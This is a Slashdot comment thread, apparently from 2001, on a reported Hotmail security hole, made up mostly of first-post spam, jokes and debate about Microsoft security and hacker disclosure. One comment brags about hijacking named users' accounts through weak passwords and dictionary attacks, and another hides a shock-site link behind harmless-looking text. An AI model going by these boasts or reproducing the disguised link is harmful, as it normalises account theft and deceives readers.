i have a bad feeling about this (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199907)

2200000

Re:i have a bad feeling about this (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199919)

2200000.01

220000th (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199909)

don't take your eyes off the prize!

220000th is mine!

Well... (1)

Ford Fulkerson (223443) | more than 12 years ago | (#2199912)

someone emails me and says "I think my boyfriend/girlfriend is cheating on me and I really need to know the backdoor into hotmail to find out".


...did s/he?

Hacked.... yeah right (1)

Pu22L3R (173070) | more than 12 years ago | (#2199913)

I think microsoft makes the holes themselves, does any other "large" organization have this much trouble? I am willing to bet you can't get into Bill Gate's house without some sort of "rent-a-cop" cause there may be a security hole there too...

what number??? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199914)

could it be? really? truely?

2200000th!!!!

hurrah!

220000th? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199915)

awww ya baby! come on!

Security hole? (1)

Saint Aardvark (159009) | more than 12 years ago | (#2199916)

Now I can finally write a LISP program to pick up my hotmail...I'm never leaving Emacs again!

again? (2)

josepha48 (13953) | more than 12 years ago | (#2199921)

Wern't they hacked a little while ago? Something about passwords or usernames or something?

I'm glad I stopped using them years ago, when M$ took over. I kinda new that their service was going down.

Lets see, they were hacked once, then the red worm did a little damage, now they are hacked again... hmm can't wait for .net, so that everyone can read my design documents. hmm do you think they 'll have local or remote storage with .net???

It's to bad that they are such a hackers target and they do little in the way of security. I wonder how strong the M$ firewall will be in XP..

I know it may seem a bit trollish, and would be suprised if someone did not ask quesitons, but then again there are those that follow blindly.. Are you a sheep or a wolf?

2200000th Alyson Hannigan post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199922)

so many Alysons.. so little time

more grits please!

Dear Rob (-1, Troll)

Shoeboy (16224) | more than 12 years ago | (#2199925)

I feel compelled to say something about pots, kettles and African-American's here. Slashdot has had and continues to have numerous holes.

I'll skip over the 2 times that you were hacked and focus on a pair of luckless users:
AxelBoldt [slashdot.org] and Randal Schwartz [slashdot.org] .

Both these users had their accounts stolen by a brilliant and handsome young foot-fetishist due to flaws in slashcode. Axelboldt used "AxelBoldt" as his password, and was then embarassed to find several passionate screeds about Heidi Wall posted under his name. Poor Randal Schwartz posted even more embarassing material [slashdot.org] , but that's what he gets for using a password of "slashdot".

Anyway Rob, I'm not criticizing, I just think that before you go casting stones at hotmail, you should at least enforce some password standards on slashdot and develop a method of detecting and blocking the dictionary attacks I've been running.

Your friend,
--Shoeboy

you know! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199928)

220000th!

who's the man?

oh ya! it's me!

'Found it' ? (2)

q-soe (466472) | more than 12 years ago | (#2199929)

Im so glad they found this flaw (one which from the reading isnt all that new) as now we know that our hotmail can be read by anyone - how ? well the kind hearted uber skilled hackers didn't just post this to MS did they ? naaah they posted ot everywhere - its the talk of IRC etc etc.

Im so glad hackers keep 'finding' things, like credit card numbers, ways into banking systems, viruses like code red - makes me feel warm and fuzzy.

My question - not to be a troll - is this (and this does not just relate to MS products but im asking a serious question)

if this security flaw had not been found (by these guys looking for a way to break into hotmail to read peoples mail) would anyone have been affected ? i mean if the flaw had to be looked for with carefull thought etc then was it a real serious issue BEFORE these guys told everyone ?

networks can have flaws and holes, open ports etc left active by a careless admin - not the best i know but big systems have a lot of work and these days we are coping with less staff (i know my company is) so sometimes things slip through.

But these guys go and look for the exploit (i mean what other reason would you have to search for this exploit BUT to be able to hack in and read mail? and then why tell everyone?

These things need to be fixed i agree but if no one wold know they were there expect for some kindly souls seeking them out then how much of an issue are they ? Are we just accepting that hackers are a good thing cause they find these problems ? what will you think when they 'fin' that flaw in the company which has your credit card number ?

when? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199933)

where?

i smoked all you fewls! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199934)

220000th, you can't front on that!

fuck you 220000th post posers, i win!

you cna't mess with me! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199942)

my 220000th posting skills are to leet for all ya'lls.

Crackers? (1)

thufir (129668) | more than 12 years ago | (#2199945)

I use to love crackers! They are a great little snack in between meals: good with cheese or jam, and not too filling.

And now they betray me, reading my personal email? Damn them!

Hackers on the other hand, I keep an eye on. Some can be good, and some can be bad (or both).

First Heidi Wall post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199947)

oops... sorry..

RMS (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199949)

Richard Stallman says: 220000th post!

"Limited Scope" (3, Insightful)

CMiYC (6473) | more than 12 years ago | (#2199952)

Why does the media try to convince people that a "fast internet connection" is a limiting factor? It seems to me that many of the people who are script kiddies, or l33 d00z, or whatever, are people have some form of broadband. That's like saying "well cars are only dangerous if you drive a Porsche."

Less than 1/2 string readable (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199957)

ABSOLUTELY NO READABLE CONTENT on this topic. Nothing, nada, just 2200000 assholes tring to get 2200000 posts written in 2 minutes.

Slashdot, your feet stink!

Approaching... (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199958)

post number #2200000!

testing. (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199963)

testin [goatse.cx] g slash2.2 [microsoft.com]

So what? (1)

HillBilly (120575) | more than 12 years ago | (#2199966)

Someone gets to read my spam. Maybe they will have better luck making their dick 4 inches longer than I did.
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>